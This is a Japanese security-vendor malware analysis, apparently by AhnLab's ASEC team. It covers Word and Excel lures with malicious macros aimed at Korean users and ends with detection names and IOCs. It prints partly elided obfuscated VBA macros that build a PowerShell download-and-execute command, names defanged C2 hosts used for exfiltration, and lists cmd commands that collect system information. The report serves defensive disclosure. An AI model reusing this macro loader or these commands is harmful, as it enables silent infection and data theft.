正常な Excel/Word ドキュメントに偽装したマルウェア

ASEC 分析チームは最近、特定タイプの不正なマクロを含むドキュメントファイルの拡散が続いていることを確認した。このタイプの不正ファイルは以下のように様々なファイル名で配布されており、そのすべてが正常なファイルを装うような内容を含んでいるため、ユーザーの注意が必要である。

  • 제헌절 국제학술포럼.doc (翻訳:制憲節国際学術フォーラム.doc)
  • 제28차 남북관계전문가토론회***.doc (翻訳:第28回南北関係専門家討論会***.doc)
  • 사례비 양식.doc (翻訳:謝礼費様式.doc)
  • email_20210516.xls
  • email_20210414.xls

最近確認された Excel ファイルの場合、配布日をファイル名に含んでおり、マクロの有効化を誘導する内容を含んでいる。また、下部には韓国国内のカード会社の情報を追加し、そのカード会社から送信されたかのように偽装している。

ユーザーがコンテンツの有効化をクリックすると、メールの確認番号入力ウィンドウが表示され、そのファイルが正常なドキュメントであるかのように構成されている。また、生年月日6桁の入力を要求し、実際に6桁の数字ではない場合は通知ウィンドウが表示される。

その後、ユーザーが6桁の数字を入力すると、ファイル内で非表示のシートとして存在していた以下のシートが表示される。このシートには、先に詐称したカード会社ではない銀行の情報を使用している。

パスワード入力時の画面

Excel ファイルに存在する不正なマクロは、ユーザーがマクロを有効化すると自動で実行される。このマクロは PowerShell コマンドで、hxxp://manstr.myartsonline.com/pc/kj.txt に接続し、追加のスクリプトをダウンロードして実行する。

マクロを有効化した場合のプロセスツリー

上記 Excel ファイルと同じタイプの不正なマクロが存在する Word ファイルは「제헌절 국제학술포럼.doc(翻訳:制憲節国際学術フォーラム.doc)」という名前で配布されており、マクロの有効化を誘導する画像が含まれていた。

コンテンツの有効化をクリックすると、特定の内容が記載された正常な文書を表示する。

Word ファイルにも、以下のように上記 Excel ファイルと類似したマクロコードを使用しており、マクロコードで使用している変数名と形式が同じである。マクロを実行すると hxxp://rukagu.mypressonline.com/le/yj.txt に接続し、追加のスクリプトをダウンロードして実行する。

Private Sub Workbook_Open()
Sheets(“Sheet1”).Select
Sheets(“Sheet2”).Visible = True
Sheets(“Sheet1”).Visible = False
eifhhdfasfiedf
End Sub

Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “+e+z+”, “”)
yhjhfjdhfdhfuesk(0) = “+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+”
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “+e+z+”, “”)
yhjhfjdhfdhfuesk(1) = “+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “+e+z+”, “”)
<中略>
yhjhfjdhfdhfuesk(6) = “+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+’+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(6), “+e+z+”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Private Sub Document_Open()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub
 <中略>
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “tuwhn”, “”)
yhjhfjdhfdhfuesk(0) = “tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn “
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “tuwhn”, “”)
yhjhfjdhfdhfuesk(1) = “tuwhnNtuwhnetuwhnttuwhn.tuwhnWtuwhnetuwhnbtuwhnCtuwhnltuwhnituwhnetuwhnntuwhnttuwhn)tuwhn.tuwhnDtuwhnntuwhngtuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “tuwhn”, “”)
<中略>
yhjhfjdhfdhfuesk(5) = “etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), “tuwhn”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Excel のマクロコード / Word のマクロコード


Excel ファイルと Word ファイルの両方とも同じ攻撃者が配布したものと推定され、それぞれの C2 を通してダウンロードされるスクリプトの不正な行為はユーザー情報の流出、追加のスクリプトダウンロード等であり、どちらのファイルも同様である。以下の図は사례비 양식.doc(翻訳:謝礼費様式.doc)の名前で配布されたファイルが接続する C2(hxxp://warms.atwebpages.com/rh/ee.txt)で確認されたスクリプトである。

C2で確認されたスクリプト

このスクリプトには、ユーザー PC 情報のアップロード、追加ファイルのダウンロード等の機能が存在する。以下のようなリストの情報を収集し、%APPDATA%\Ahnlab\Ahnlab.hwp ファイルに収集したデータを保存したあと、hxxp://warms.atwebpages.com/rh/post.php にアップロードする。

  • 最近使った項目
  • Program Files (x86) ファイルおよびフォルダー
  • systeminfo 情報
  • tasklist 情報
作成されたログファイル

その後、hxxp://warms.atwebpages.com/rh/ee.down アドレスから特定のストリングを受け取ってデコードしたあと、Start-Job –ScriptBlock コマンドによってバックグラウンドで実行する。また、HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に Alzipupdate という名前でレジストリの作成を試みるが、データが正常に登録されない。

現在はダウンロードアドレスに接続ができないため、今後の行為については確認が不可能だが、同じドメインで不正なスクリプトが更に発見された。以下の画像は hxxp://warms.atwebpages.com/rh/hollow64.txt で追加で発見されたスクリプトである。

追加で発見されたスクリプト

このスクリプトは %windir%\SysWOW64\cmd.exe を実行したあと hxxp://warms.atwebpages.com/rh/baymax[数字].txt から以下の画像のデータをダウンロードし、前もって実行したプロセスにインジェクションして不正な行為を実行する。

追加でダウンロードされる不正なデータ

cmd.exe にインジェクションされた不正な PE は、ユーザーが最近使用したドキュメントが存在するディレクトリ内の項目、Program Files ディレクトリ内の項目、systeminfo 情報を %APPDATA%\Microsoft\Network\Alzip に保存してから wariii.mypressonline[.]com/home/jpg/downpost.php に送信する。その後、hxxp://wariii.mypressonline.com/home/jpg/downdownload.php?filename=baymax[数字]から追加の不正ファイルをダウンロードして %APPDATA%\Microsoft\Network\Alzip.dll で保存および実行する。

ダウンロードされた Alzip.dll ファイルは svchost.exe に不正な PE をインジェクションし、%APPDATA%\pagefile.sys を生成および実行する。最終的に実行される pagefile.sys ファイルは、ユーザーの情報を収集してメールで送信する行為を実行する。

pagefile.sys プロパティ

pagefile.sys ファイルを実行すると %AppData%\OneDriver\down\hancom.dll で自己複製を行ってから、SOFTWARE\\VMware, Inc.\\Vmware Tools、SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers 等のレジストリを確認して、動作中の環境に当該レジストリが存在する場合、実行を終了する。その後、cmd.exe /c taskkill /f /im daumcleaner.exe コマンドを実行して daumcleaner.exe を終了したあと HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dropbox に hancom.dll を登録する。

作成されたレジストリ

また、以下のコマンドを実行して収集した情報を %AppData%\OneDriver\out\PI_001.dat に保存してから Flower9801@hanmail[.]net へ送信する。

-cmd.exe /c ipconfig/all >>”%AppData%\OneDriver\out\PI_001.dat” & arp -a >”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c systeminfo >>”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c tasklist >>”%AppData%\OneDriver\out\PI_001.dat”
実行コマンドのリスト

前述した2つのファイル以外の別のファイル名を持つドキュメントは収集されなかったものの、すべて同じマクロコードを使用しており、上記の方法で不正な行為を実行するものと推定される。

このように、正常な文章の内容を含んでいる不正なドキュメントファイルは以前から継続的に拡散している。このタイプのドキュメントファイルは、不正なマクロを実行したあとに初めとは異なる画面を表示するため、ユーザーが不正ファイルであることを認知するのが困難である。マクロの使用を誘導するファイルを開く場合は注意が必要であり、出どころが不明なファイルの場合は閲覧を避けなければならない。

現在 V3 では、このマルウェアを次のような検知名で検知している。

[ファイル検知]
Downloader/DOC.Generic
Downloader/XLS.Agent
Trojan/Win.Agent.C4480883
Trojan/Win.Agent.C4408018

[IOC 情報]
1269e2b00fd323a7748215124cb058cd
811f8c88cda9e8c4f448aa6f380e5a93
e61aafd8d7065a2fa8d5a343098b98cb
0629fd238259d7df7aa22ca82ac6b93e
hxxp://warms.atwebpages.com
hxxp://rukagu.mypressonline.com
hxxp://manstr.myartsonline.com
hxxp://wariii.mypressonline.com

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments